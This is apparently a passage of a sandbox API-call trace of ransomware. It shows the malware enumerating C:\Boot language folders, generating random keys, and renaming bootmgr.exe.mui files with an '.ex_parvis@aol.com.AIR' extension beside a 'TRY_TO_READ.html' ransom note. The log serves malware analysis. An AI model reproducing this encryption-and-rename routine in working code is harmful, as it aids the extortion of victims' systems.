	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5800 | out: hHeap=0x540000) returned 1
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.037] FindNextFileW (in: hFindFile=0x575660, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.037] GetLastError () returned 0x6
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5800
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5800 | out: hHeap=0x540000) returned 1
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.037] FindNextFileW (in: hFindFile=0x575660, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.037] GetLastError () returned 0x6
	[0052.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.038] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.038] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.038] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.038] FindNextFileW (in: hFindFile=0x575660, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b7a10
	[0052.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596720
	[0052.038] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b7a10 | out: pbBuffer=0x5b7a10) returned 1
	[0052.038] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596720 | out: pbBuffer=0x596720) returned 1
	[0052.038] SetFileAttributesW (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.038] lstrlenW (lpString="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui") returned 30
	[0052.038] GetProcessHeap () returned 0x540000
	[0052.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.038] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui") returned="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui"
	[0052.038] lstrcatW (in: lpString1="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.038] MoveFileExW (lpExistingFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.038] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.038] GetProcessHeap () returned 0x540000
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.039] CloseHandle (hObject=0xffffffff) returned 0
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.039] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5850 | out: hHeap=0x540000) returned 1
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5878 | out: hHeap=0x540000) returned 1
	[0052.039] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-CN\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5756a0
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.039] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.039] GetLastError () returned 0x6
	[0052.039] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.039] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.039] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5850
	[0052.039] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5756e0
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5756e0 | out: hHeap=0x540000) returned 1
	[0052.039] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5850 | out: hHeap=0x540000) returned 1
	[0052.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.039] FindNextFileW (in: hFindFile=0x5756a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.040] GetLastError () returned 0x6
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5850
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5756e0
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5756e0 | out: hHeap=0x540000) returned 1
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5850 | out: hHeap=0x540000) returned 1
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.040] FindNextFileW (in: hFindFile=0x5756a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.040] GetLastError () returned 0x6
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5850
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5850 | out: hHeap=0x540000) returned 1
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.040] FindNextFileW (in: hFindFile=0x5756a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.040] GetLastError () returned 0x6
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.041] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.041] FindNextFileW (in: hFindFile=0x5756a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.041] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.041] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b7b18
	[0052.041] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596730
	[0052.041] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b7b18 | out: pbBuffer=0x5b7b18) returned 1
	[0052.041] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596730 | out: pbBuffer=0x596730) returned 1
	[0052.041] SetFileAttributesW (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.041] lstrlenW (lpString="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui") returned 30
	[0052.041] GetProcessHeap () returned 0x540000
	[0052.041] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.041] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui") returned="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui"
	[0052.041] lstrcatW (in: lpString1="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.041] MoveFileExW (lpExistingFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.041] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.041] GetProcessHeap () returned 0x540000
	[0052.041] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.041] CloseHandle (hObject=0xffffffff) returned 0
	[0052.041] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.041] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.041] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.041] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.041] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58a0 | out: hHeap=0x540000) returned 1
	[0052.041] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58c8 | out: hHeap=0x540000) returned 1
	[0052.041] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-HK\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5756e0
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.042] GetLastError () returned 0x6
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58a0
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575720
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575720 | out: hHeap=0x540000) returned 1
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58a0 | out: hHeap=0x540000) returned 1
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.042] FindNextFileW (in: hFindFile=0x5756e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.042] GetLastError () returned 0x6
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58a0
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575720
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575720 | out: hHeap=0x540000) returned 1
	[0052.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58a0 | out: hHeap=0x540000) returned 1
	[0052.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.042] FindNextFileW (in: hFindFile=0x5756e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.043] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.043] GetLastError () returned 0x6
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58a0
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.043] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.043] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.043] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58a0 | out: hHeap=0x540000) returned 1
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.043] FindNextFileW (in: hFindFile=0x5756e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cfc8b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.043] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.043] GetLastError () returned 0x6
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.043] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.043] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.043] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.043] FindNextFileW (in: hFindFile=0x5756e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cfc8b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b7c20
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596740
	[0052.043] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b7c20 | out: pbBuffer=0x5b7c20) returned 1
	[0052.043] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596740 | out: pbBuffer=0x596740) returned 1
	[0052.043] SetFileAttributesW (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.043] lstrlenW (lpString="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui") returned 30
	[0052.043] GetProcessHeap () returned 0x540000
	[0052.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.043] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui") returned="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui"
